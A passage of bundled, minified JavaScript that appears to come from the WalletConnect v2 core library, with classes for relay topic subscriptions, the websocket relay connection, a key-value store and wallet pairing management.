        super(e, t), this.relayer = e, this.logger = t, this.subscriptions = new Map, this.topicMap = new $e9e439c110f17033$var$dr, this.events = new (0, $7etJZ.EventEmitter), this.name = $e9e439c110f17033$export$9c3a96bb670cddb8, this.version = $e9e439c110f17033$export$fb57e03bef4c4cea, this.pending = new Map, this.cached = [], this.initialized = !1, this.pendingSubscriptionWatchLabel = "pending_sub_watch_label", this.pollingInterval = 20, this.storagePrefix = $e9e439c110f17033$export$f258d29ae5e3d545, this.subscribeTimeout = 1e4, this.restartInProgress = !1, this.batchSubscribeTopicsLimit = 500, this.init = async ()=>{
            this.initialized || (this.logger.trace("Initialized"), await this.restart(), this.registerEventListeners(), this.onEnable(), this.clientId = await this.relayer.core.crypto.getClientId());
        }, this.subscribe = async (i, s)=>{
            await this.restartToComplete(), this.isInitialized(), this.logger.debug("Subscribing Topic"), this.logger.trace({
                type: "method",
                method: "subscribe",
                params: {
                    topic: i,
                    opts: s
                }
            });
            try {
                const n = (0, $a5d33cfc7f8e5437$export$cf77af25151525db)(s), a = {
                    topic: i,
                    relay: n
                };
                this.pending.set(i, a);
                const o = await this.rpcSubscribe(i, n);
                return this.onSubscribe(o, a), this.logger.debug("Successfully Subscribed Topic"), this.logger.trace({
                    type: "method",
                    method: "subscribe",
                    params: {
                        topic: i,
                        opts: s
                    }
                }), o;
            } catch (n) {
                throw this.logger.debug("Failed to Subscribe Topic"), this.logger.error(n), n;
            }
        }, this.unsubscribe = async (i, s)=>{
            await this.restartToComplete(), this.isInitialized(), typeof s?.id < "u" ? await this.unsubscribeById(i, s.id, s) : await this.unsubscribeByTopic(i, s);
        }, this.isSubscribed = async (i)=>this.topics.includes(i) ? !0 : await new Promise((s, n)=>{
                const a = new (0, $aG48A.Watch);
                a.start(this.pendingSubscriptionWatchLabel);
                const o = setInterval(()=>{
                    !this.pending.has(i) && this.topics.includes(i) && (clearInterval(o), a.stop(this.pendingSubscriptionWatchLabel), s(!0)), a.elapsed(this.pendingSubscriptionWatchLabel) >= $e9e439c110f17033$export$9a2ddbfe54f8af77 && (clearInterval(o), a.stop(this.pendingSubscriptionWatchLabel), n(new Error("Subscription resolution timeout")));
                }, this.pollingInterval);
            }).catch(()=>!1), this.on = (i, s)=>{
            this.events.on(i, s);
        }, this.once = (i, s)=>{
            this.events.once(i, s);
        }, this.off = (i, s)=>{
            this.events.off(i, s);
        }, this.removeListener = (i, s)=>{
            this.events.removeListener(i, s);
        }, this.restart = async ()=>{
            this.restartInProgress = !0, await this.restore(), await this.reset(), this.restartInProgress = !1;
        }, this.relayer = e, this.logger = (0, $7fc0ce2591a9daef$exports.generateChildLogger)(t, this.name), this.clientId = "";
    }
    get context() {
        return (0, $7fc0ce2591a9daef$exports.getLoggerContext)(this.logger);
    }
    get storageKey() {
        return this.storagePrefix + this.version + "//" + this.name;
    }
    get length() {
        return this.subscriptions.size;
    }
    get ids() {
        return Array.from(this.subscriptions.keys());
    }
    get values() {
        return Array.from(this.subscriptions.values());
    }
    get topics() {
        return this.topicMap.topics;
    }
    hasSubscription(e, t) {
        let i = !1;
        try {
            i = this.getSubscription(e).topic === t;
        } catch  {}
        return i;
    }
    onEnable() {
        this.cached = [], this.initialized = !0;
    }
    onDisable() {
        this.cached = this.values, this.subscriptions.clear(), this.topicMap.clear();
    }
    async unsubscribeByTopic(e, t) {
        const i = this.topicMap.get(e);
        await Promise.all(i.map(async (s)=>await this.unsubscribeById(e, s, t)));
    }
    async unsubscribeById(e, t, i) {
        this.logger.debug("Unsubscribing Topic"), this.logger.trace({
            type: "method",
            method: "unsubscribe",
            params: {
                topic: e,
                id: t,
                opts: i
            }
        });
        try {
            const s = (0, $a5d33cfc7f8e5437$export$cf77af25151525db)(i);
            await this.rpcUnsubscribe(e, t, s);
            const n = (0, $a5d33cfc7f8e5437$export$8203ef1531c8b5b5)("USER_DISCONNECTED", `${this.name}, ${e}`);
            await this.onUnsubscribe(e, t, n), this.logger.debug("Successfully Unsubscribed Topic"), this.logger.trace({
                type: "method",
                method: "unsubscribe",
                params: {
                    topic: e,
                    id: t,
                    opts: i
                }
            });
        } catch (s) {
            throw this.logger.debug("Failed to Unsubscribe Topic"), this.logger.error(s), s;
        }
    }
    async rpcSubscribe(e, t) {
        const i = {
            method: (0, $a5d33cfc7f8e5437$export$604e3deb95e1b734)(t.protocol).subscribe,
            params: {
                topic: e
            }
        };
        this.logger.debug("Outgoing Relay Payload"), this.logger.trace({
            type: "payload",
            direction: "outgoing",
            request: i
        });
        try {
            await await (0, $a5d33cfc7f8e5437$export$3da2293b007ed708)(this.relayer.request(i), this.subscribeTimeout);
        } catch  {
            this.logger.debug("Outgoing Relay Subscribe Payload stalled"), this.relayer.events.emit($e9e439c110f17033$export$d56245796e2837d.connection_stalled);
        }
        return (0, $a5d33cfc7f8e5437$export$d4c241cec96564c1)(e + this.clientId);
    }
    async rpcBatchSubscribe(e) {
        if (!e.length) return;
        const t = e[0].relay, i = {
            method: (0, $a5d33cfc7f8e5437$export$604e3deb95e1b734)(t.protocol).batchSubscribe,
            params: {
                topics: e.map((s)=>s.topic)
            }
        };
        this.logger.debug("Outgoing Relay Payload"), this.logger.trace({
            type: "payload",
            direction: "outgoing",
            request: i
        });
        try {
            return await await (0, $a5d33cfc7f8e5437$export$3da2293b007ed708)(this.relayer.request(i), this.subscribeTimeout);
        } catch  {
            this.logger.debug("Outgoing Relay Payload stalled"), this.relayer.events.emit($e9e439c110f17033$export$d56245796e2837d.connection_stalled);
        }
    }
    rpcUnsubscribe(e, t, i) {
        const s = {
            method: (0, $a5d33cfc7f8e5437$export$604e3deb95e1b734)(i.protocol).unsubscribe,
            params: {
                topic: e,
                id: t
            }
        };
        return this.logger.debug("Outgoing Relay Payload"), this.logger.trace({
            type: "payload",
            direction: "outgoing",
            request: s
        }), this.relayer.request(s);
    }
    onSubscribe(e, t) {
        this.setSubscription(e, $e9e439c110f17033$var$pe($e9e439c110f17033$var$K({}, t), {
            id: e
        })), this.pending.delete(t.topic);
    }
    onBatchSubscribe(e) {
        e.length && e.forEach((t)=>{
            this.setSubscription(t.id, $e9e439c110f17033$var$K({}, t)), this.pending.delete(t.topic);
        });
    }
    async onUnsubscribe(e, t, i) {
        this.events.removeAllListeners(t), this.hasSubscription(t, e) && this.deleteSubscription(t, i), await this.relayer.messages.del(e);
    }
    async setRelayerSubscriptions(e) {
        await this.relayer.core.storage.setItem(this.storageKey, e);
    }
    async getRelayerSubscriptions() {
        return await this.relayer.core.storage.getItem(this.storageKey);
    }
    setSubscription(e, t) {
        this.subscriptions.has(e) || (this.logger.debug("Setting subscription"), this.logger.trace({
            type: "method",
            method: "setSubscription",
            id: e,
            subscription: t
        }), this.addSubscription(e, t));
    }
    addSubscription(e, t) {
        this.subscriptions.set(e, $e9e439c110f17033$var$K({}, t)), this.topicMap.set(t.topic, e), this.events.emit($e9e439c110f17033$export$24ff3e54e94ef413.created, t);
    }
    getSubscription(e) {
        this.logger.debug("Getting subscription"), this.logger.trace({
            type: "method",
            method: "getSubscription",
            id: e
        });
        const t = this.subscriptions.get(e);
        if (!t) {
            const { message: i } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("NO_MATCHING_KEY", `${this.name}: ${e}`);
            throw new Error(i);
        }
        return t;
    }
    deleteSubscription(e, t) {
        this.logger.debug("Deleting subscription"), this.logger.trace({
            type: "method",
            method: "deleteSubscription",
            id: e,
            reason: t
        });
        const i = this.getSubscription(e);
        this.subscriptions.delete(e), this.topicMap.delete(i.topic, e), this.events.emit($e9e439c110f17033$export$24ff3e54e94ef413.deleted, $e9e439c110f17033$var$pe($e9e439c110f17033$var$K({}, i), {
            reason: t
        }));
    }
    async persist() {
        await this.setRelayerSubscriptions(this.values), this.events.emit($e9e439c110f17033$export$24ff3e54e94ef413.sync);
    }
    async reset() {
        if (this.cached.length) {
            const e = Math.ceil(this.cached.length / this.batchSubscribeTopicsLimit);
            for(let t = 0; t < e; t++){
                const i = this.cached.splice(0, this.batchSubscribeTopicsLimit);
                await this.batchSubscribe(i);
            }
        }
        this.events.emit($e9e439c110f17033$export$24ff3e54e94ef413.resubscribed);
    }
    async restore() {
        try {
            const e = await this.getRelayerSubscriptions();
            if (typeof e > "u" || !e.length) return;
            if (this.subscriptions.size) {
                const { message: t } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("RESTORE_WILL_OVERRIDE", this.name);
                throw this.logger.error(t), this.logger.error(`${this.name}: ${JSON.stringify(this.values)}`), new Error(t);
            }
            this.cached = e, this.logger.debug(`Successfully Restored subscriptions for ${this.name}`), this.logger.trace({
                type: "method",
                method: "restore",
                subscriptions: this.values
            });
        } catch (e) {
            this.logger.debug(`Failed to Restore subscriptions for ${this.name}`), this.logger.error(e);
        }
    }
    async batchSubscribe(e) {
        if (!e.length) return;
        const t = await this.rpcBatchSubscribe(e);
        (0, $a5d33cfc7f8e5437$export$41dd3d480aac4a71)(t) && this.onBatchSubscribe(t.map((i, s)=>$e9e439c110f17033$var$pe($e9e439c110f17033$var$K({}, e[s]), {
                id: i
            })));
    }
    async onConnect() {
        this.restartInProgress || (await this.restart(), this.onEnable());
    }
    onDisconnect() {
        this.onDisable();
    }
    async checkPending() {
        if (this.relayer.transportExplicitlyClosed) return;
        const e = [];
        this.pending.forEach((t)=>{
            e.push(t);
        }), await this.batchSubscribe(e);
    }
    registerEventListeners() {
        this.relayer.core.heartbeat.on((0, $212993b948b3fe4b$exports.HEARTBEAT_EVENTS).pulse, async ()=>{
            await this.checkPending();
        }), this.relayer.on($e9e439c110f17033$export$d56245796e2837d.connect, async ()=>{
            await this.onConnect();
        }), this.relayer.on($e9e439c110f17033$export$d56245796e2837d.disconnect, ()=>{
            this.onDisconnect();
        }), this.events.on($e9e439c110f17033$export$24ff3e54e94ef413.created, async (e)=>{
            const t = $e9e439c110f17033$export$24ff3e54e94ef413.created;
            this.logger.info(`Emitting ${t}`), this.logger.debug({
                type: "event",
                event: t,
                data: e
            }), await this.persist();
        }), this.events.on($e9e439c110f17033$export$24ff3e54e94ef413.deleted, async (e)=>{
            const t = $e9e439c110f17033$export$24ff3e54e94ef413.deleted;
            this.logger.info(`Emitting ${t}`), this.logger.debug({
                type: "event",
                event: t,
                data: e
            }), await this.persist();
        });
    }
    isInitialized() {
        if (!this.initialized) {
            const { message: e } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("NOT_INITIALIZED", this.name);
            throw new Error(e);
        }
    }
    async restartToComplete() {
        this.restartInProgress && await new Promise((e)=>{
            const t = setInterval(()=>{
                this.restartInProgress || (clearInterval(t), e());
            }, this.pollingInterval);
        });
    }
}
var $e9e439c110f17033$var$mr = Object.defineProperty, $e9e439c110f17033$var$St = Object.getOwnPropertySymbols, $e9e439c110f17033$var$Er = Object.prototype.hasOwnProperty, $e9e439c110f17033$var$fr = Object.prototype.propertyIsEnumerable, $e9e439c110f17033$var$Pt = (r, e, t)=>e in r ? $e9e439c110f17033$var$mr(r, e, {
        enumerable: !0,
        configurable: !0,
        writable: !0,
        value: t
    }) : r[e] = t, $e9e439c110f17033$var$wr = (r, e)=>{
    for(var t in e || (e = {}))$e9e439c110f17033$var$Er.call(e, t) && $e9e439c110f17033$var$Pt(r, t, e[t]);
    if ($e9e439c110f17033$var$St) for (var t of $e9e439c110f17033$var$St(e))$e9e439c110f17033$var$fr.call(e, t) && $e9e439c110f17033$var$Pt(r, t, e[t]);
    return r;
};
class $e9e439c110f17033$export$70e73aa29a3d4407 extends (0, $bace94c1ef08d1bc$export$9a0f755fd4f79434) {
    constructor(e){
        super(e), this.protocol = "wc", this.version = 2, this.events = new (0, $7etJZ.EventEmitter), this.name = $e9e439c110f17033$export$602d6e27611c3fcb, this.transportExplicitlyClosed = !1, this.initialized = !1, this.reconnecting = !1, this.connectionStatusPollingInterval = 20, this.staleConnectionErrors = [
            "socket hang up",
            "socket stalled"
        ], this.request = async (t)=>{
            this.logger.debug("Publishing Request Payload");
            try {
                return await this.toEstablishConnection(), await this.provider.request(t);
            } catch (i) {
                throw this.logger.debug("Failed to Publish Request"), this.logger.error(i), i;
            }
        }, this.core = e.core, this.logger = typeof e.logger < "u" && typeof e.logger != "string" ? (0, $7fc0ce2591a9daef$exports.generateChildLogger)(e.logger, this.name) : (0, $7fc0ce2591a9daef$exports.pino)((0, $7fc0ce2591a9daef$exports.getDefaultLoggerOptions)({
            level: e.logger || $e9e439c110f17033$export$5176ffa6778d6637
        })), this.messages = new $e9e439c110f17033$export$4a2542d0790ac2fd(this.logger, e.core), this.subscriber = new $e9e439c110f17033$export$60959659b2c22881(this, this.logger), this.publisher = new $e9e439c110f17033$var$lr(this, this.logger), this.relayUrl = e?.relayUrl || $e9e439c110f17033$export$a68061e6c48f332a, this.projectId = e.projectId, this.provider = {};
    }
    async init() {
        this.logger.trace("Initialized"), await this.createProvider(), await Promise.all([
            this.messages.init(),
            this.subscriber.init()
        ]);
        try {
            await this.transportOpen();
        } catch  {
            this.logger.warn(`Connection via ${this.relayUrl} failed, attempting to connect via failover domain ${$e9e439c110f17033$export$27fee22bec112637}...`), await this.restartTransport($e9e439c110f17033$export$27fee22bec112637);
        }
        this.registerEventListeners(), this.initialized = !0, setTimeout(async ()=>{
            this.subscriber.topics.length === 0 && (this.logger.info("No topics subscribed to after init, closing transport"), await this.transportClose(), this.transportExplicitlyClosed = !1);
        }, $e9e439c110f17033$export$fb3eab7adf12329d);
    }
    get context() {
        return (0, $7fc0ce2591a9daef$exports.getLoggerContext)(this.logger);
    }
    get connected() {
        return this.provider.connection.connected;
    }
    get connecting() {
        return this.provider.connection.connecting;
    }
    async publish(e, t, i) {
        this.isInitialized(), await this.publisher.publish(e, t, i), await this.recordMessageEvent({
            topic: e,
            message: t,
            publishedAt: Date.now()
        });
    }
    async subscribe(e, t) {
        var i;
        this.isInitialized();
        let s = ((i = this.subscriber.topicMap.get(e)) == null ? void 0 : i[0]) || "";
        return s || (await Promise.all([
            new Promise((n)=>{
                this.subscriber.once($e9e439c110f17033$export$24ff3e54e94ef413.created, (a)=>{
                    a.topic === e && n();
                });
            }),
            new Promise(async (n)=>{
                s = await this.subscriber.subscribe(e, t), n();
            })
        ]), s);
    }
    async unsubscribe(e, t) {
        this.isInitialized(), await this.subscriber.unsubscribe(e, t);
    }
    on(e, t) {
        this.events.on(e, t);
    }
    once(e, t) {
        this.events.once(e, t);
    }
    off(e, t) {
        this.events.off(e, t);
    }
    removeListener(e, t) {
        this.events.removeListener(e, t);
    }
    async transportClose() {
        this.transportExplicitlyClosed = !0, this.connected && (await this.provider.disconnect(), this.events.emit($e9e439c110f17033$export$d56245796e2837d.transport_closed));
    }
    async transportOpen(e) {
        if (this.transportExplicitlyClosed = !1, !this.reconnecting) {
            this.relayUrl = e || this.relayUrl, this.reconnecting = !0;
            try {
                await Promise.all([
                    new Promise((t)=>{
                        this.initialized || t(), this.subscriber.once($e9e439c110f17033$export$24ff3e54e94ef413.resubscribed, ()=>{
                            t();
                        });
                    }),
                    await Promise.race([
                        new Promise(async (t, i)=>{
                            await (0, $a5d33cfc7f8e5437$export$3da2293b007ed708)(this.provider.connect(), 1e4, `Socket stalled when trying to connect to ${this.relayUrl}`).catch((s)=>i(s)).then(()=>t()).finally(()=>this.removeListener($e9e439c110f17033$export$d56245796e2837d.transport_closed, this.rejectTransportOpen));
                        }),
                        new Promise((t)=>this.once($e9e439c110f17033$export$d56245796e2837d.transport_closed, this.rejectTransportOpen))
                    ])
                ]);
            } catch (t) {
                this.logger.error(t);
                const i = t;
                if (!this.isConnectionStalled(i.message)) throw t;
                this.events.emit($e9e439c110f17033$export$d56245796e2837d.transport_closed);
            } finally{
                this.reconnecting = !1;
            }
        }
    }
    async restartTransport(e) {
        this.transportExplicitlyClosed || this.reconnecting || (this.relayUrl = e || this.relayUrl, this.connected && await Promise.all([
            new Promise((t)=>{
                this.provider.once($e9e439c110f17033$export$58062acf2f31ddf8.disconnect, ()=>{
                    t();
                });
            }),
            this.transportClose()
        ]), await this.createProvider(), await this.transportOpen());
    }
    isConnectionStalled(e) {
        return this.staleConnectionErrors.some((t)=>e.includes(t));
    }
    rejectTransportOpen() {
        throw new Error("Attempt to connect to relay via `transportOpen` has stalled. Retrying...");
    }
    async createProvider() {
        const e = await this.core.crypto.signJWT(this.relayUrl);
        this.provider = new (0, $1582203255a670cd$export$da28308012bf6748)(new (0, $5d413cc341fdd8f8$export$2e2bcd8739ae039)((0, $a5d33cfc7f8e5437$export$d875b3963ef774f5)({
            sdkVersion: $e9e439c110f17033$export$5f30917a6f8c9025,
            protocol: this.protocol,
            version: this.version,
            relayUrl: this.relayUrl,
            projectId: this.projectId,
            auth: e,
            useOnCloseEvent: !0
        }))), this.registerProviderListeners();
    }
    async recordMessageEvent(e) {
        const { topic: t, message: i } = e;
        await this.messages.set(t, i);
    }
    async shouldIgnoreMessageEvent(e) {
        const { topic: t, message: i } = e;
        if (!i || i.length === 0) return this.logger.debug(`Ignoring invalid/empty message: ${i}`), !0;
        if (!await this.subscriber.isSubscribed(t)) return this.logger.debug(`Ignoring message for non-subscribed topic ${t}`), !0;
        const s = this.messages.has(t, i);
        return s && this.logger.debug(`Ignoring duplicate message: ${i}`), s;
    }
    async onProviderPayload(e) {
        if (this.logger.debug("Incoming Relay Payload"), this.logger.trace({
            type: "payload",
            direction: "incoming",
            payload: e
        }), (0, $2e45abd1d679ec32$export$f6e4034abe07d2a5)(e)) {
            if (!e.method.endsWith($e9e439c110f17033$export$119b4645f6b233c8)) return;
            const t = e.params, { topic: i, message: s, publishedAt: n } = t.data, a = {
                topic: i,
                message: s,
                publishedAt: n
            };
            this.logger.debug("Emitting Relayer Payload"), this.logger.trace($e9e439c110f17033$var$wr({
                type: "event",
                event: t.id
            }, a)), this.events.emit(t.id, a), await this.acknowledgePayload(e), await this.onMessageEvent(a);
        } else (0, $2e45abd1d679ec32$export$308ba927de2bcbe8)(e) && this.events.emit($e9e439c110f17033$export$d56245796e2837d.message_ack, e);
    }
    async onMessageEvent(e) {
        await this.shouldIgnoreMessageEvent(e) || (this.events.emit($e9e439c110f17033$export$d56245796e2837d.message, e), await this.recordMessageEvent(e));
    }
    async acknowledgePayload(e) {
        const t = (0, $3bb3ddc7bbc938cc$export$478fdea01c2a3198)(e.id, !0);
        await this.provider.connection.send(t);
    }
    registerProviderListeners() {
        this.provider.on($e9e439c110f17033$export$58062acf2f31ddf8.payload, (e)=>this.onProviderPayload(e)), this.provider.on($e9e439c110f17033$export$58062acf2f31ddf8.connect, ()=>{
            this.events.emit($e9e439c110f17033$export$d56245796e2837d.connect);
        }), this.provider.on($e9e439c110f17033$export$58062acf2f31ddf8.disconnect, ()=>{
            this.onProviderDisconnect();
        }), this.provider.on($e9e439c110f17033$export$58062acf2f31ddf8.error, (e)=>{
            this.logger.error(e), this.events.emit($e9e439c110f17033$export$d56245796e2837d.error, e);
        });
    }
    registerEventListeners() {
        this.events.on($e9e439c110f17033$export$d56245796e2837d.connection_stalled, async ()=>{
            await this.restartTransport();
        });
    }
    onProviderDisconnect() {
        this.events.emit($e9e439c110f17033$export$d56245796e2837d.disconnect), this.attemptToReconnect();
    }
    attemptToReconnect() {
        this.transportExplicitlyClosed || setTimeout(async ()=>{
            await this.restartTransport();
        }, (0, $aG48A.toMiliseconds)($e9e439c110f17033$export$11ccd39be2c57d6));
    }
    isInitialized() {
        if (!this.initialized) {
            const { message: e } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("NOT_INITIALIZED", this.name);
            throw new Error(e);
        }
    }
    async toEstablishConnection() {
        if (!this.connected) {
            if (this.connecting) return await new Promise((e)=>{
                const t = setInterval(()=>{
                    this.connected && (clearInterval(t), e());
                }, this.connectionStatusPollingInterval);
            });
            await this.restartTransport();
        }
    }
}
var $e9e439c110f17033$var$vr = Object.defineProperty, $e9e439c110f17033$var$xt = Object.getOwnPropertySymbols, $e9e439c110f17033$var$Ir = Object.prototype.hasOwnProperty, $e9e439c110f17033$var$Cr = Object.prototype.propertyIsEnumerable, $e9e439c110f17033$var$At = (r, e, t)=>e in r ? $e9e439c110f17033$var$vr(r, e, {
        enumerable: !0,
        configurable: !0,
        writable: !0,
        value: t
    }) : r[e] = t, $e9e439c110f17033$var$zt = (r, e)=>{
    for(var t in e || (e = {}))$e9e439c110f17033$var$Ir.call(e, t) && $e9e439c110f17033$var$At(r, t, e[t]);
    if ($e9e439c110f17033$var$xt) for (var t of $e9e439c110f17033$var$xt(e))$e9e439c110f17033$var$Cr.call(e, t) && $e9e439c110f17033$var$At(r, t, e[t]);
    return r;
};
class $e9e439c110f17033$export$390f32400eaf98c9 extends (0, $bace94c1ef08d1bc$export$a7f17ba6c54777e7) {
    constructor(e, t, i, s = $e9e439c110f17033$export$f258d29ae5e3d545, n){
        super(e, t, i, s), this.core = e, this.logger = t, this.name = i, this.map = new Map, this.version = $e9e439c110f17033$export$629a342182ba24b, this.cached = [], this.initialized = !1, this.storagePrefix = $e9e439c110f17033$export$f258d29ae5e3d545, this.init = async ()=>{
            this.initialized || (this.logger.trace("Initialized"), await this.restore(), this.cached.forEach((a)=>{
                this.getKey && a !== null && !(0, $a5d33cfc7f8e5437$export$fce6876652108ab)(a) ? this.map.set(this.getKey(a), a) : (0, $a5d33cfc7f8e5437$export$f657f7976bb2769d)(a) ? this.map.set(a.id, a) : (0, $a5d33cfc7f8e5437$export$c96d5113768aaf5e)(a) && this.map.set(a.topic, a);
            }), this.cached = [], this.initialized = !0);
        }, this.set = async (a, o)=>{
            this.isInitialized(), this.map.has(a) ? await this.update(a, o) : (this.logger.debug("Setting value"), this.logger.trace({
                type: "method",
                method: "set",
                key: a,
                value: o
            }), this.map.set(a, o), await this.persist());
        }, this.get = (a)=>(this.isInitialized(), this.logger.debug("Getting value"), this.logger.trace({
                type: "method",
                method: "get",
                key: a
            }), this.getData(a)), this.getAll = (a)=>(this.isInitialized(), a ? this.values.filter((o)=>Object.keys(a).every((h)=>(0, (/*@__PURE__*/$parcel$interopDefault($6cqMT)))(o[h], a[h]))) : this.values), this.update = async (a, o)=>{
            this.isInitialized(), this.logger.debug("Updating value"), this.logger.trace({
                type: "method",
                method: "update",
                key: a,
                update: o
            });
            const h = $e9e439c110f17033$var$zt($e9e439c110f17033$var$zt({}, this.getData(a)), o);
            this.map.set(a, h), await this.persist();
        }, this.delete = async (a, o)=>{
            this.isInitialized(), this.map.has(a) && (this.logger.debug("Deleting value"), this.logger.trace({
                type: "method",
                method: "delete",
                key: a,
                reason: o
            }), this.map.delete(a), await this.persist());
        }, this.logger = (0, $7fc0ce2591a9daef$exports.generateChildLogger)(t, this.name), this.storagePrefix = s, this.getKey = n;
    }
    get context() {
        return (0, $7fc0ce2591a9daef$exports.getLoggerContext)(this.logger);
    }
    get storageKey() {
        return this.storagePrefix + this.version + "//" + this.name;
    }
    get length() {
        return this.map.size;
    }
    get keys() {
        return Array.from(this.map.keys());
    }
    get values() {
        return Array.from(this.map.values());
    }
    async setDataStore(e) {
        await this.core.storage.setItem(this.storageKey, e);
    }
    async getDataStore() {
        return await this.core.storage.getItem(this.storageKey);
    }
    getData(e) {
        const t = this.map.get(e);
        if (!t) {
            const { message: i } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("NO_MATCHING_KEY", `${this.name}: ${e}`);
            throw this.logger.error(i), new Error(i);
        }
        return t;
    }
    async persist() {
        await this.setDataStore(this.values);
    }
    async restore() {
        try {
            const e = await this.getDataStore();
            if (typeof e > "u" || !e.length) return;
            if (this.map.size) {
                const { message: t } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("RESTORE_WILL_OVERRIDE", this.name);
                throw this.logger.error(t), new Error(t);
            }
            this.cached = e, this.logger.debug(`Successfully Restored value for ${this.name}`), this.logger.trace({
                type: "method",
                method: "restore",
                value: this.values
            });
        } catch (e) {
            this.logger.debug(`Failed to Restore value for ${this.name}`), this.logger.error(e);
        }
    }
    isInitialized() {
        if (!this.initialized) {
            const { message: e } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("NOT_INITIALIZED", this.name);
            throw new Error(e);
        }
    }
}
class $e9e439c110f17033$export$3370ee24730992a3 {
    constructor(e, t){
        this.core = e, this.logger = t, this.name = $e9e439c110f17033$export$390360ea476c6145, this.version = $e9e439c110f17033$export$5593ec74b27d1b18, this.events = new (0, (/*@__PURE__*/$parcel$interopDefault($7etJZ))), this.initialized = !1, this.storagePrefix = $e9e439c110f17033$export$f258d29ae5e3d545, this.ignoredPayloadTypes = [
            (0, $a5d33cfc7f8e5437$export$406e97c329f0f3d4)
        ], this.registeredMethods = [], this.init = async ()=>{
            this.initialized || (await this.pairings.init(), await this.cleanup(), this.registerRelayerEvents(), this.registerExpirerEvents(), this.initialized = !0, this.logger.trace("Initialized"));
        }, this.register = ({ methods: i })=>{
            this.isInitialized(), this.registeredMethods = [
                ...new Set([
                    ...this.registeredMethods,
                    ...i
                ])
            ];
        }, this.create = async ()=>{
            this.isInitialized();
            const i = (0, $a5d33cfc7f8e5437$export$d15a28e4f1821243)(), s = await this.core.crypto.setSymKey(i), n = (0, $a5d33cfc7f8e5437$export$b136d03015bfc12)((0, $aG48A.FIVE_MINUTES)), a = {
                protocol: $e9e439c110f17033$export$822d0bd1635d5360
            }, o = {
                topic: s,
                expiry: n,
                relay: a,
                active: !1
            }, h = (0, $a5d33cfc7f8e5437$export$b2786ede34fb2350)({
                protocol: this.core.protocol,
                version: this.core.version,
                topic: s,
                symKey: i,
                relay: a
            });
            return await this.pairings.set(s, o), await this.core.relayer.subscribe(s), this.core.expirer.set(s, n), {
                topic: s,
                uri: h
            };
        }, this.pair = async (i)=>{
            this.isInitialized(), this.isValidPair(i);
            const { topic: s, symKey: n, relay: a } = (0, $a5d33cfc7f8e5437$export$59f58847421cfb28)(i.uri);
            if (this.pairings.keys.includes(s)) throw new Error(`Pairing already exists: ${s}`);
            if (this.core.crypto.hasKeys(s)) throw new Error(`Keychain already exists: ${s}`);
            const o = (0, $a5d33cfc7f8e5437$export$b136d03015bfc12)((0, $aG48A.FIVE_MINUTES)), h = {
                topic: s,
                relay: a,
                expiry: o,
                active: !1
            };
            return await this.pairings.set(s, h), await this.core.crypto.setSymKey(n, s), await this.core.relayer.subscribe(s, {
                relay: a
            }), this.core.expirer.set(s, o), i.activatePairing && await this.activate({
                topic: s
            }), h;
        }, this.activate = async ({ topic: i })=>{
            this.isInitialized();
            const s = (0, $a5d33cfc7f8e5437$export$b136d03015bfc12)((0, $aG48A.THIRTY_DAYS));
            await this.pairings.update(i, {
                active: !0,
                expiry: s
            }), this.core.expirer.set(i, s);
        }, this.ping = async (i)=>{
            this.isInitialized(), await this.isValidPing(i);
            const { topic: s } = i;
            if (this.pairings.keys.includes(s)) {
                const n = await this.sendRequest(s, "wc_pairingPing", {}), { done: a, resolve: o, reject: h } = (0, $a5d33cfc7f8e5437$export$cbf9e3cc9ffc85cb)();
                this.events.once((0, $a5d33cfc7f8e5437$export$e3eb27ce66c0f6d9)("pairing_ping", n), ({ error: l })=>{
                    l ? h(l) : o();
                }), await a();
            }
        }, this.updateExpiry = async ({ topic: i, expiry: s })=>{
            this.isInitialized(), await this.pairings.update(i, {
                expiry: s
            });
        }, this.updateMetadata = async ({ topic: i, metadata: s })=>{
            this.isInitialized(), await this.pairings.update(i, {
                peerMetadata: s
            });
        }, this.getPairings = ()=>(this.isInitialized(), this.pairings.values), this.disconnect = async (i)=>{
            this.isInitialized(), await this.isValidDisconnect(i);
            const { topic: s } = i;
            this.pairings.keys.includes(s) && (await this.sendRequest(s, "wc_pairingDelete", (0, $a5d33cfc7f8e5437$export$8203ef1531c8b5b5)("USER_DISCONNECTED")), await this.deletePairing(s));
        }, this.sendRequest = async (i, s, n)=>{
            const a = (0, $3bb3ddc7bbc938cc$export$11d081ebb32d4398)(s, n), o = await this.core.crypto.encode(i, a), h = $e9e439c110f17033$export$d94d6986a8185883[s].req;
            return this.core.history.set(i, a), this.core.relayer.publish(i, o, h), a.id;
        }, this.sendResult = async (i, s, n)=>{
            const a = (0, $3bb3ddc7bbc938cc$export$478fdea01c2a3198)(i, n), o = await this.core.crypto.encode(s, a), h = await this.core.history.get(s, i), l = $e9e439c110f17033$export$d94d6986a8185883[h.request.method].res;
            await this.core.relayer.publish(s, o, l), await this.core.history.resolve(a);
        }, this.sendError = async (i, s, n)=>{
            const a = (0, $3bb3ddc7bbc938cc$export$9f7302ae26c3f77)(i, n), o = await this.core.crypto.encode(s, a), h = await this.core.history.get(s, i), l = $e9e439c110f17033$export$d94d6986a8185883[h.request.method] ? $e9e439c110f17033$export$d94d6986a8185883[h.request.method].res : $e9e439c110f17033$export$d94d6986a8185883.unregistered_method.res;
            await this.core.relayer.publish(s, o, l), await this.core.history.resolve(a);
        }, this.deletePairing = async (i, s)=>{
            await this.core.relayer.unsubscribe(i), await Promise.all([
                this.pairings.delete(i, (0, $a5d33cfc7f8e5437$export$8203ef1531c8b5b5)("USER_DISCONNECTED")),
                this.core.crypto.deleteSymKey(i),
                s ? Promise.resolve() : this.core.expirer.del(i)
            ]);
        }, this.cleanup = async ()=>{
            const i = this.pairings.getAll().filter((s)=>(0, $a5d33cfc7f8e5437$export$57947cfd429801a2)(s.expiry));
            await Promise.all(i.map((s)=>this.deletePairing(s.topic)));
        }, this.onRelayEventRequest = (i)=>{
            const { topic: s, payload: n } = i;
            switch(n.method){
                case "wc_pairingPing":
                    return this.onPairingPingRequest(s, n);
                case "wc_pairingDelete":
                    return this.onPairingDeleteRequest(s, n);
                default:
                    return this.onUnknownRpcMethodRequest(s, n);
            }
        }, this.onRelayEventResponse = async (i)=>{
